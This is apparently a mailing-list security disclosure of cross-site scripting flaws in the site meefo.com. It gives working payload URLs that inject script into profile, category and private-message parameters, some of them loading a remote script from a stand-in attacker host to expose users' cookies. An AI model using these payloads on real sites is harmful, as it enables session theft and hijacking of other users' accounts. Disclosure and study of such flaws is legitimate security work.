<<< Date Index >>>     <<< Thread Index >>>

Meefo.com - XSS with cookie include



Meefo.com

Homepage:
http://meefo.com

Effected files:
reading profiles
index.php
input boxes onprofiles
sending private msgs

------------------------------

Reading aprofile and with cookie include PoC:
Since data isn't properlly filtered (backslashes are added to ' and "), a user 
can input malicious data, such as 

<script>alert(document.cookie)</script> and itwill popup with the users cookie. 
Incldued at the end of this article are 

screenshots of the cookie vuln. Screenshots meefo4 and meefo5.jpg show this.

http://meefo.com/?do=rdprof&user_pp=username<script>alert(document.cookie)</script>

When editing your profile, data isn't properally filtered in theinput boxes 
either, so <script>alert(document.cookie)</

script> works here too.

Another XSS Vulnerability example:
http://meefo.com/?do=rdprof&user_pp=<SCRIPT 
SRC=http://evilsite.com/xss.js></SCRIPT>

Reading catagories XSS Vuln:
http://meefo.com/index.php?cat=Poetry<SCRIPT 
SRC=http://evilsite.com/xss.js></SCRIPT>

Sending PM's XSS Vuln:
http://meefo.com/?messages=send&to=<SCRIPT 
SRC=http://evilsite.com/xss.js></SCRIPT>


Screenshots of cookie include vulns & more:

http://www.youfucktard.com/xsp/meefo1.jpg
http://www.youfucktard.com/xsp/meefo2.jpg
http://www.youfucktard.com/xsp/meefo3.jpg
http://www.youfucktard.com/xsp/meefo4.jpg
http://www.youfucktard.com/xsp/meefo5.jpg
http://www.youfucktard.com/xsp/meefo6.jpg